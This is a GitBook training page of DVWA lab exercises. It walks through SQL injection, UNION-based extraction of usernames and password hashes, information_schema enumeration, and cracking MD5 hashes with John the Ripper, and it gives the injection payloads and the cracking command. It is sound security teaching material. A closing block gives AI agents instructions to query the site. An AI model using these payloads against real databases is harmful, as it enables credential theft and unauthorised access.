# DVWA Exercises 5 ### 09 SQL Injection

Here we can see an input field where we can put in a number. The sql statement in the background could look like this: `select firstname,surname from users where uid='$_GET['id']';` Let's try to inject a SQL statement: `1' or '1' = '1`

### 10 SQL Injection with union With SQL Union we can grab information from other tables. The `UNION` keyword lets you execute one or more additional `SELECT` queries and append the results to the original query. For example: ``` SELECT a, b FROM table1 UNION SELECT c, d FROM table2 ``` This SQL query will return a single result set with two columns, containing values from columns `a` and `b` in `table1` and columns `c` and `d` in `table2`. For a `UNION` query to work, two key requirements must be met: * The individual queries must return the same number of columns. * The data types in each column must be compatible between the individual queries. Let's try the following SQL Query: ``` %' or '0'='0' union select user,password from users # ```

### 11 Further Database Enumeration Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database. You can query `information_schema.tables` to list the tables in the database: ``` SELECT * FROM information_schema.tables ``` You can then query `information_schema.columns` to list the columns in individual tables: ``` SELECT * FROM information_schema.columns WHERE table_name = 'Users' ``` Let's try the following SQL Query: ``` %' or '0'='0' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS # ```

### 12 Crack the password hashes I put the collected password hashes in a file and try to crack the passwords with John the ripper. First let's check which hash type we have with a tool called `hash-identifier:` ![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F38raPTBo7ndrEvAJB3D3%2Fjtr01.png?alt=media\&token=9b574745-e9ee-4f2e-b3d9-1d590e6809b8) ``` john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt ``` ![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F89o8dBiCEpCxB1U0qEpF%2Fjtr02.png?alt=media\&token=847cde24-6f92-491a-a15a-9f07a99e9245) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cas-cyber.gitbook.io/cas-cybersecurity/web-application-security/dvwa/dvwa-exercises-5.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.